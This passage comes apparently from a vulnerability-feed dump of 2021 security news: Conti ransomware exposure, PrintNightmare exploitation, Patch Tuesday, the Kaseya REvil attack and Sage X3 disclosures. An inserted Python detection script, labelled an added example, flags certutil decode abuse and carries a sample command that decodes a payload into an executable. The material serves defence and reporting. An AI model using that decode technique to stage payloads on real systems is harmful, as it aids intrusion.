Interestingly, an investigation into Conti's ransomware negotiation process [published](<https://team-cymru.com/blog/2021/10/05/collaborative-research-on-the-conti-ransomware-group/>) by Team Cymru last month highlighted a similar open web URL named \"contirecovery[.]info.\"\n\n\"In order to tackle the complex challenge of disrupting cybercriminal organizations, public and private forces need to work collaboratively with one another to better understand and mitigate the wider legal and commercial impact of the threat,\" the researchers said.\n\n**_Update:_** The Conti ransomware's payment [portals](<https://twitter.com/VK_Intel/status/1461810216241086467>) are back up and running, more than 24 hours after they were first taken down in response to a report that identified the real IP address of one of its recovery (aka payment) servers \u2014 217.12.204[.]135 \u2014 the downtime apparently having been used to shore up that infrastructure.\n\n\"Looks like Europeans have also decided to abandon their manners and go full-gangsta simply trying to break our systems,\" the gang said in a statement posted on their blog, effectively confirming PRODAFT's findings, but characterizing the details as \"simply disinformation,\" and that \"the reported 25kk which we 'made since July' is straight-up BS - we've made around 300kk at least.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-19T06:50:00", "type": "thn", "title": "Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13374", "CVE-2018-13379", "CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-11-20T15:13:21", "id": "THN:F35E41E26872B23A7F620C6D8F7E2334", "href": "https://thehackernews.com/2021/11/experts-expose-secrets-of-conti.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-YB6xMmNkBp0/YRYuIvxMidI/AAAAAAAADhg/a2Ee5QkoQZw6JlnYhCIdg3Nk-HM2yu2wwCLcBGAsYHQ/s0/ransomware.jpg>)\n\nRansomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims 
and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems.\n\n\"Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward,\" Cisco Talos [said](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) in a report published Thursday, corroborating an [independent analysis](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea.\n\nWhile Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions. 
The attacks are said to have taken place since at least July 13.\n\nSince June, a series of \"PrintNightmare\" issues affecting the Windows print spooler service has come to light that could enable remote code execution or local privilege escalation when the component performs privileged file operations:\n\n * [**CVE-2021-1675**](<https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on June 8)\n * [**CVE-2021-34527**](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on July 6-7)\n * [**CVE-2021-34481**](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36936**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10) \n * [**CVE-2021-36947**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Patched on August 10)\n * [**CVE-2021-34483**](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>) \\- Windows Print Spooler Elevation of Privilege Vulnerability (Patched on August 10)\n * [**CVE-2021-36958**](<https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html>) \\- Windows Print Spooler Remote Code Execution Vulnerability (Unpatched)\n\nCrowdStrike noted that it was able to prevent attempts by the Magniber ransomware gang to exploit the PrintNightmare vulnerability.\n\nVice Society, on the other hand, leveraged a variety of techniques to conduct post-compromise discovery and reconnaissance prior to bypassing native Windows protections for credential theft and privilege 
escalation.\n\n[](<https://thehackernews.com/images/-JlsTWIHVgX4/YRYltMOGBKI/AAAAAAAADhQ/pzUFIcW6y0ABjOe3PuUQE5cPSnEOvGP9ACLcBGAsYHQ/s0/ransomware.jpg>)\n\nSpecifically, the attacker is believed to have used a malicious library associated with the PrintNightmare flaw (CVE-2021-34527) to pivot to multiple systems across the environment and extract credentials from the victim.\n\n\"Adversaries are constantly refining their approach to the ransomware attack lifecycle as they strive to operate more effectively, efficiently, and evasively,\" the researchers said. \"The use of the vulnerability known as PrintNightmare shows that adversaries are paying close attention and will quickly incorporate new tools that they find useful for various purposes during their attacks.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T08:29:00", "type": "thn", "title": "Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34527", "CVE-2021-36936", "CVE-2021-36947", "CVE-2021-36958"], "modified": "2021-08-13T08:32:51", "id": "THN:6428957E9DED493169A2E63839F98667", "href": "https://thehackernews.com/2021/08/ransomware-gangs-exploiting-windows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-aVEUxlp9r9o/YO5q47NA_bI/AAAAAAAADL4/tkntZNY2smU5FPaAkTU1qBYUg8VPhp8NACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft rolled out [Patch Tuesday updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) for the month of July with fixes for a total of 117 security vulnerabilities, including nine zero-day flaws, of which four are said to be under active attacks in the wild, potentially enabling an adversary to take control of affected systems. \n\nOf the 117 issues, 13 are rated Critical, 103 are rated Important, and one is rated as Moderate in severity, with six of these bugs publicly known at the time of release. \n\nThe updates span across several of Microsoft's products, including Windows, Bing, Dynamics, Exchange Server, Office, Scripting Engine, Windows DNS, and Visual Studio Code. 
July also marks a dramatic jump in the volume of vulnerabilities, surpassing the number Microsoft collectively addressed as part of its updates in [May](<https://thehackernews.com/2021/05/latest-microsoft-windows-updates-patch.html>) (55) and [June](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) (50).\n\nChief among the security flaws actively exploited are as follows \u2014\n\n * **CVE-2021-34527** (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability (publicly disclosed as \"[PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)\")\n * **CVE-2021-31979** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-33771** (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability\n * **CVE-2021-34448** (CVSS score: 6.8) - Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft also stressed the high attack complexity of CVE-2021-34448, specifically stating that the attacks hinge on the possibility of luring an unsuspecting user into clicking on a link that leads to a malicious website hosted by the adversary and contains a specially-crafted file that's engineered to trigger the vulnerability.\n\nThe other five publicly disclosed, but not exploited, zero-day vulnerabilities are listed below \u2014\n\n * **CVE-2021-34473** (CVSS score: 9.1) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * **CVE-2021-34523** (CVSS score: 9.0) - Microsoft Exchange Server Elevation of Privilege Vulnerability\n * **CVE-2021-33781** (CVSS score: 8.1) - Active Directory Security Feature Bypass Vulnerability\n * **CVE-2021-33779** (CVSS score: 8.1) - Windows ADFS Security Feature Bypass Vulnerability\n * **CVE-2021-34492** (CVSS score: 8.1) - Windows Certificate Spoofing Vulnerability\n\n\"This Patch Tuesday comes just days after out-of-band updates were released to address PrintNightmare \u2014 the critical flaw in the Windows 
Print Spooler service that was found in all versions of Windows,\" Bharat Jogi, senior manager of vulnerability and threat research at Qualys, told The Hacker News.\n\n\"While MSFT has released updates to fix the vulnerability, users must still ensure that necessary configurations are set up correctly. Systems with misconfigurations will continue to be at risk of exploitation, even after the latest patch has been applied. PrintNightmare was a highly serious issue that further underscores the importance of marrying detection and remediation,\" Jogi added.\n\nThe PrintNightmare vulnerability has also prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to [release an emergency directive](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler>), urging federal departments and agencies to apply the latest security updates immediately and to stop and disable the Print Spooler service on Microsoft Active Directory Domain Controllers.\n\nMicrosoft also fixed a security bypass vulnerability in the Windows Hello biometrics-based authentication solution ([CVE-2021-34466](<https://www.cyberark.com/resources/threat-research-blog/bypassing-windows-hello-without-masks-or-plastic-surgery>), CVSS score: 5.7) that could permit an adversary to spoof a target's face and get around the login screen.\n\nOther critical flaws remediated by Microsoft include remote code execution vulnerabilities affecting Windows DNS Server (CVE-2021-34494, CVSS score 8.8) and Windows Kernel (CVE-2021-34458), the latter of which is rated 9.9 on the CVSS severity scale.\n\n\"This issue allows a single root input/output virtualization (SR-IOV) device which is assigned to a guest to potentially interfere with its Peripheral Component Interface Express (PCIe) siblings which are attached to other guests or to the root,\" Microsoft noted in its advisory for CVE-2021-34458, adding Windows instances hosting 
virtual machines are vulnerable to this flaw.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update and select Check for updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-07-01>)\n * [Apache Tomcat](<https://mail-archives.us.apache.org/mod_mbox/www-announce/202107.mbox/%3Cd050b202-b64e-bc6f-a630-2dd83202f23a%40apache.org%3E>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/article/CTX319750>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11180&cat=SIRT_1&actp=LIST>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-July/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=580617506>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n
", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-14T05:03:00", "type": "thn", "title": "Update Your Windows PCs to Patch 117 New Flaws, Including 9 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34466", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34494", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-17T11:52:45", "id": "THN:9FD8A70F9C17C3AF089A104965E48C95", "href": "https://thehackernews.com/2021/07/update-your-windows-pcs-to-patch-117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-13T17:08:07", "description": "\n\nRapid7 is aware of and tracking all information surrounding a coordinated, mass ransomware attack reported to be affecting hundreds of 
organizations. Huntress Labs is maintaining a public [Reddit thread](<https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/>) documenting the scope and triage of an event that has, as of the original post date (see updates below), stemmed from 8 managed service providers. Rapid7 does not use Kaseya or a Kaseya MSP and we are not affected by this mass ransomware attack.\n\nRapid7 is updating this post as more information becomes available. Core information is below the most recent updates.\n\n### 2021-07-13\n\n * CISA has [updated their Kaseya ransomware event guidance](<https://us-cert.cisa.gov/kaseya-ransomware-attack>) for affected managed service providers and their customers.\n\n### 2021-07-11\n\n * In a video post today, Kaseya [has indicated](<https://videos.sproutvideo.com/embed/d39ddab51e14efc25a/50fb34477e68d73c?type=hd>) that they are still planning to go ahead with re-enabling an updated VSA SaaS and rollout of the on-prem VSA server update. Some runbook instructions have changed, so any organization planning on going live today should [review those changes](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) to see if they impact its environment.\n\n### 2021-07-09\n\n * The Dutch Institute for Vulnerability Disclosure (DIVD) [published](<https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/>) more information on the specific vulnerabilities they shared with Kaseya: \n * [CVE-2021-30116](<https://attackerkb.com/search?q=CVE-2021-30116>) \\- A credentials leak and business logic flaw, resolution in progress. [CVSS 10]\n * [CVE-2021-30117](<https://attackerkb.com/search?q=CVE-2021-30117>) \\- An SQL injection vulnerability, resolved in May 8th patch. [CVSS 9.8]\n * [CVE-2021-30118](<https://attackerkb.com/search?q=CVE-2021-30118>) \\- A Remote Code Execution vulnerability, resolved in April 10th patch. 
(v9.5.6) [CVSS 9.8]\n * [CVE-2021-30119](<https://attackerkb.com/search?q=CVE-2021-30119>) \\- A Cross-Site Scripting vulnerability, resolution in progress. [CVSS 5.4]\n * [CVE-2021-30120](<https://attackerkb.com/search?q=CVE-2021-30120>) \\- 2FA bypass, resolution in progress. [CVSS 9.9]\n * [CVE-2021-30121](<https://attackerkb.com/search?q=CVE-2021-30121>) \\- A Local File Inclusion vulnerability, resolved in May 8th patch. [CVSS 6.5]\n * [CVE-2021-30201](<https://attackerkb.com/search?q=CVE-2021-30201>) \\- An XML External Entity vulnerability, resolved in May 8th patch. [CVSS 7.5]\n * President Biden [urged Vladimir Putin](<https://www.nytimes.com/2021/07/09/us/politics/putin-biden-ransomware-hackers.html?referringSource=articleShare>) to \u2018take action to disrupt\u2019 Russia-based hackers behind ransomware attacks.\n\n### 2021-07-08\n\n * Kaseya has [posted a video from their CEO](<https://videos.sproutvideo.com/embed/119ddab21e19e0cd98/19739709ce717d3b?type=hd>) notifying customers that patches and VSA SaaS will likely be available this coming Sunday afternoon (July 11, 2021).\n * According to Malwarebytes, some threat actors [are capitalizing on the extended response to the Kaseya mass ransomware attack](<https://twitter.com/MBThreatIntel/status/1412518446013812737?s=20>) and are targeting victims via email with fake patches that push Cobalt Strike payloads.\n\n### 2021-07-07\n\n * Kaseya has posted runbooks for [on-premises VSAs](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) with steps on how to prepare VSA servers for the forthcoming patch. 
These details include the installation of FireEye's agent software along with details on how to isolate the server from production networks, and [SaaS customers](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993>) for how to prepare for the SaaS VSAs coming back online.\n\n### 2021-07-06\n\n * In a [statement posted late Monday night](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>), Kaseya provided an update on their assessment of the impact of the attack: _"we are aware of fewer than 60 Kaseya customers, all of whom were using the VSA on-premises product, who were directly compromised by this attack. While many of these customers provide IT services to multiple other companies, we understand the total impact thus far has been to fewer than 1,500 downstream businesses. We have not found evidence that any of our SaaS customers were compromised._\n * The Compromise Detection Tool, which was originally only provided directly to customers, [has been made public](<https://kaseya.box.com/s/p9b712dcwfsnhuq2jmx31ibsuef6xict>). 
The tool searches for indicators of compromise, evidence of data encryption, and the REvil ransom note.\n * Kaseya also stated that \u2014 based on advice by outside experts \u2014 customers who experienced ransomware and receive communication from the attackers _should not click on any links as they may be weaponized_.\n\n### 2021-07-05\n\n * Deputy National Security Advisor for Cyber and Emerging Technology Anne Neuberger [issued a statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/04/statement-by-deputy-national-security-advisor-for-cyber-and-emerging-technology-anne-neuberger-on-reporting-kaseya-compromises/>) noting that the President has directed the full resources of the government to investigate this incident and urged anyone who believes their systems have been compromised in the Kaseya ransomware incident to immediately report to the Internet Crime Complaint Center at <https://www.IC3.gov>.\n * The Associated Press [is reporting](<https://apnews.com/article/joe-biden-europe-government-and-politics-technology-business-fc0df4c42f8cd6148bf936ca24bb5cbe>) that REvil has offered a blanket decryption for all victims of the Kaseya attack in exchange for $70 million.\n * Incident responders across multiple firms are indicating the number of victim organizations is in the thousands, spanning over 18 countries.\n\n### 2021-07-04\n\n * Cado Security published [resources](<https://www.cadosecurity.com/post/resources-for-dfir-professionals-responding-to-the-revil-ransomware-kaseya-supply-chain-attack>) which can aid responders as they triage their exposure to the mass ransomware incident.\n * CISA and the FBI have issued [guidance for MSPs and their customers](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa>) who have been affected by the Kaseya VSA supply-chain ransomware attack.\n\n### 2021-07-03 Update\n\n * The Washington Post has [a story with information on 
the ransom demands being made](<https://www.washingtonpost.com/technology/2021/07/02/kaseya-ransomware-attack/>)\n * The Dutch Institute for Vulnerability Disclosure (DIVD) [posted information](<https://csirt.divd.nl/2021/07/03/Kaseya-Case-Update/>) on their ongoing investigation into and response to the Kaseya incident, which includes details on their efforts to identify and secure internet-facing VSA servers.\n * CISA posted an [initial advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack>) and is taking action to understand and address the recent supply-chain ransomware attack.\n * Bloomberg [is reporting](<https://www.bloomberg.com/news/articles/2021-07-03/number-of-victims-continues-to-grow-in-massive-ransomware-attack>) that the attack (so far) spans over 1,000 organizations across 11 countries with numerous downstream impacts.\n\n### Original/Main Content\n\nEvidence points to a supply chain attack targeting Kaseya VSA patch management and monitoring software. 
Ransom notes suggest REvil is behind the coordinated attack.\n\nRapid7 Managed Detection and Response teams suggest that, out of an abundance of caution, organizations that use either an on-premises Kaseya VSA solution or the Kaseya cloud-based VSA solution perform the following steps immediately:\n\n * Disable or uninstall the Kaseya agent\n * If you host the Kaseya management server, shut down this system (Kaseya also strongly suggests this course of action)\n\nKaseya appears to be providing updates via their [public helpdesk page](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689>) and their [status page](<https://status.kaseya.net/>) provides visibility into the status of their hosted infrastructure.\n\nResearcher [@BushidoToken](<https://twitter.com/BushidoToken>) has provided a [link to a GitHub gist containing the REvil configuration dump](<https://twitter.com/BushidoToken/status/1411054457450811397>), which includes indicators of compromise organizations may be able to use to detect evidence of these actors operating in their infrastructure.\n\n## Rapid7 Customers\n\n### Managed Detection and Response\n\nRapid7's Managed Detection and Response (MDR) team had existing attacker behavior detections that identified Kaseya-related ransomware activity beginning on Friday, July 2, 2021. Following the initial wave of alerts on Friday, July 2, MDR sent an email communication with a `Critical Advisory` to all MDR customers with guidance on disabling Kaseya and mitigating risk. We have conducted hunts across customer environments and deployed additional detections to accelerate identification of the threat. 
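Rapid7's detections for this event (the InsightIDR rule names are listed under the next heading) key on three behaviours: certutil.exe invoked with its decode flag, certutil running under a different file name, and the agent.exe dropped under the KWorking directory. The Python below is an added example, not Rapid7's rule logic or code from this post, that scores Sysmon-style process-creation events for those behaviours. The field names (Image, OriginalFileName, CommandLine), the extension list and the sample events are assumptions constructed for the example, not telemetry from the incident.

```python
"""Process-creation triage for the certutil-decode pattern.

Added example: this is not Rapid7's InsightIDR rule logic, only an
illustration of the behaviours the listed detection names describe.
Events are dicts carrying Sysmon Event ID 1 style fields (Image,
OriginalFileName, CommandLine); SAMPLE_EVENTS below are constructed,
not real telemetry from the Kaseya incident.
"""
import ntpath
import shlex

DECODE_FLAGS = {"-decode", "/decode", "-decodehex", "/decodehex"}
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".cpl", ".sys", ".bat", ".ps1"}

SAMPLE_EVENTS = [  # constructed sample telemetry
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"},  # benign use
    {"Image": r"C:\Windows\cert.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe"},
    {"Image": r"C:\kworking\agent.exe", "OriginalFileName": "agent.exe",
     "CommandLine": r"c:\kworking\agent.exe"},
]


def _argv(command_line):
    """Split a Windows command line; posix=False keeps backslashes literal."""
    try:
        parts = shlex.split(command_line, posix=False)
    except ValueError:  # unbalanced quotes: degrade to a whitespace split
        parts = command_line.split()
    return [p.strip('"') for p in parts]


def _is_certutil(event):
    """Identify certutil by its PE OriginalFileName, which survives a copy to
    a new path, a rename, or bytes appended to change the file hash."""
    image_name = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    return image_name == "certutil.exe" or original == "certutil.exe"


def classify(event):
    """Return the detection names (as Rapid7 lists them) that fire for one event."""
    hits = []
    image = event.get("Image", "")
    image_name = ntpath.basename(image).lower()
    argv = _argv(event.get("CommandLine", ""))
    lowered = [a.lower() for a in argv]

    if _is_certutil(event):
        if image_name != "certutil.exe":
            hits.append("Suspicious Process - Renamed CertUtil")
        decode_at = next((i for i, a in enumerate(lowered) if a in DECODE_FLAGS), None)
        if decode_at is not None:
            hits.append("Attacker Technique - CertUtil With Decode Flag")
            # certutil -decode <infile> <outfile>: the output path is two tokens on
            outfile = argv[decode_at + 2] if len(argv) > decode_at + 2 else ""
            if ntpath.splitext(outfile)[1].lower() in EXEC_EXTENSIONS:
                hits.append("Suspicious Process - Certutil Decodes Executable File")

    # The dropped payload runs from the Kaseya agent working directory.
    if image.lower().replace("/", "\\").endswith("\\kworking\\agent.exe"):
        hits.append("Attacker Tool - KWorking\\agent.exe")
    return hits


def triage(events):
    """Map each event's image path to the detections it triggered."""
    return {e["Image"]: classify(e) for e in events}


if __name__ == "__main__":
    for image, names in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {names or 'clean'}")
```

Matching on OriginalFileName rather than the image path is what makes the renamed-binary case fire: copying certutil.exe to another path or appending bytes changes its name and hash but not the version resource the loader reads. Parsing the command line with posix=False keeps Windows paths intact, so the output argument of -decode can be checked for an executable extension rather than alerting on every decode.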
Affected customers have been notified.\n\n### InsightIDR\n\nRapid7 has deployed the following detections in InsightIDR for attacker behavior related to the Kaseya ransomware attack:\n\n * Attacker Technique - CertUtil With Decode Flag\n * Suspicious Process - Renamed CertUtil\n * Suspicious Process - Certutil Decodes Executable File\n * Attacker Tool - KWorking\\agent.exe", "cvss3": {}, "published": "2021-07-13T16:00:00", "type": "rapid7blog", "title": "Managed Service Providers Used in Coordinated, Mass Ransomware Attack Impacting Hundreds of Companies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-13T16:00:00", "id": "RAPID7BLOG:2CAE6785586002C85C620CF61D6C68C2", "href": "https://blog.rapid7.com/2021/07/13/managed-service-providers-used-in-coordinated-mass-ransomware-attack-impacting-hundreds-of-companies/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-07T14:55:28", "description": "\n\nFour vulnerabilities involving Sage X3 were identified by Rapid7 researchers Jonathan Peterson, Aaron Herndon, Cale Black, Ryan Villarreal, and William Vu. These vulnerabilities were reported to Sage according to Rapid7's usual [vulnerability disclosure process](<https://www.rapid7.com/security/disclosure/#zeroday>) and were fixed in recent releases for Sage X3 Version 9 (those components that ship with Syracuse 9.22.7.2), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Sage X3 Version 11 (Syracuse v11.25.2.6), and Sage X3 Version 12 (Syracuse v12.10.2.8). Note, there was no commercially available Version 10 of Sage X3.\n\nThese vulnerabilities are summarized in the table below: The first two are protocol-related issues involving remote administration of Sage X3, and the latter two are web application vulnerabilities. 
Generally speaking, Sage X3 installations should not be exposed directly to the internet, and should instead be made available via a secure VPN connection where required. Following this operational advice effectively mitigates all four vulnerabilities, though customers are still urged to update according to their usual patch cycle schedules.

CVE Identifier | CWE Identifier | CVSS score (Severity) | Remediation
---|---|---|---
CVE-2020-7388 | [CWE-290](<http://cwe.mitre.org/data/definitions/290.html>): Unauthenticated Command Execution Bypass by Spoofing in AdxAdmin | [10.0](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N&version=3.1>) (Critical) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>)
CVE-2020-7387 | [CWE-200](<http://cwe.mitre.org/data/definitions/200.html>): Exposure of Sensitive Information to an Unauthorized Actor in AdxAdmin | [5.3](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N&version=3.1>) (Medium) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>)
CVE-2020-7389 | [CWE-306](<http://cwe.mitre.org/data/definitions/306.html>): Missing Authentication for Critical Function in Developer Environment in Syracuse | [5.5](<http://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N&version=3.1>) (Medium) | No fix planned, as this is a development function and not a production function.
CVE-2020-7390 | [CWE-79](<http://cwe.mitre.org/data/definitions/79.html>): Persistent Cross-Site Scripting (XSS) in Syracuse | [4.6](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N&version=3.1>) (Medium) | [Update available](<http://www.sagecity.com/gb/sage-x3-uk/f/sage-x3-uk-announcements-news-and-alerts/147993/sage-x3-latest-patches>) (note, this affects V12 only, unlike the other issues, which affect V9 and V11 as well)

# Product description

Sage X3 is an Enterprise Resource Planning (ERP) application, and is primarily used for supply chain management in medium to large enterprises. The product is especially popular in British and other European markets. More information about Sage X3 can be found at the [vendor's website](<https://www.sage.com/en-gb/sage-business-cloud/sage-x3/>).

## Credit

These issues were discovered by Rapid7 researchers Jonathan Peterson ([@deadjakk](<https://twitter.com/deadjakk>)), Aaron Herndon ([@ac3lives](<https://twitter.com/ac3lives>)), Cale Black, Ryan Villarreal ([@XjCrazy09](<https://twitter.com/XjCrazy09>)), and William Vu. They are being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).

